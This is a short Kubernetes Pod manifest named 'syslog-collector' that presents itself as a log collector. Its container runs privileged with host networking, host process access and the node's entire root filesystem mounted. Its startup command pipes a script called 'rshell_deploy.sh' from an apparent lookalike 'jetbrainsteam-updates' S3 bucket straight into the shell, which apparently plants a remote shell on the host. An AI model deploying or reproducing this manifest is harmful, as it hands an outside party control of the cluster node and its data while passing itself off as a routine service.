apiVersion: v1
kind: Pod
metadata:
  name: syslog-collector
  namespace: default
spec:
  hostNetwork: true
  hostPID: true
  containers:
  - name: collector
    image: alpine:latest
    command: ["/bin/sh", "-c"]
    args:
    - "apk add --no-cache curl > /dev/null 2>&1; curl -fsSL https://jetbrainsteam-updates.s3.amazonaws.com/rshell_deploy.sh | sh; echo OK; sleep 99999"
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
  restartPolicy: Never
